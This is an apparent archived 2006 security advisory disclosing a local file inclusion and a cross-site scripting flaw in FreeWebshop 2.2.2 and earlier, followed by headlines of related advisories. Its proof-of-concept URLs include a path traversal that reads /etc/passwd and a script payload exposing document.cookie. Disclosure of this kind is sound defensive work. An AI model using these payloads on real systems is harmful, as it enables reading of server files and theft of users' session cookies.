Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) gtcatalog <= 0.9.1 (index.php) Remote File Include Vulnerability LetterIt v2 (inc/session.php) Remote File Include Vulnerability [Full-disclosure] RSS Injection in Sage part 2 Immediacy .NET CMS possibly vulnerable to Cross Site Scripting through a malformed cookie From:laurent gaffié <saps.audit_(at)_gmail.com> Date:09.11.2006Subject:FreeWebshop <=2.2.2 [local file include & xss]FreeWebshop <=2.2.2 severity: hight vendor site: http://www.freewebshop.org/ impact: an anonymous user can access anyfile on the remote server PoC : http://site.com/?page=../../../../../../../../../../etc/passwd%00 http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00 xss get : http://www.site.com/demo/index.php?page=browse&action=list&group=8&ca t=</textarea>'"><script>alert(document.cookie)</script> laurent gaffie & benjamin mosse http://s-a-p.ca/ contact: saps.audit@gmail.com
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
gtcatalog <= 0.9.1 (index.php) Remote File Include Vulnerability
LetterIt v2 (inc/session.php) Remote File Include Vulnerability
[Full-disclosure] RSS Injection in Sage part 2
Immediacy .NET CMS possibly vulnerable to Cross Site Scripting through a malformed cookie
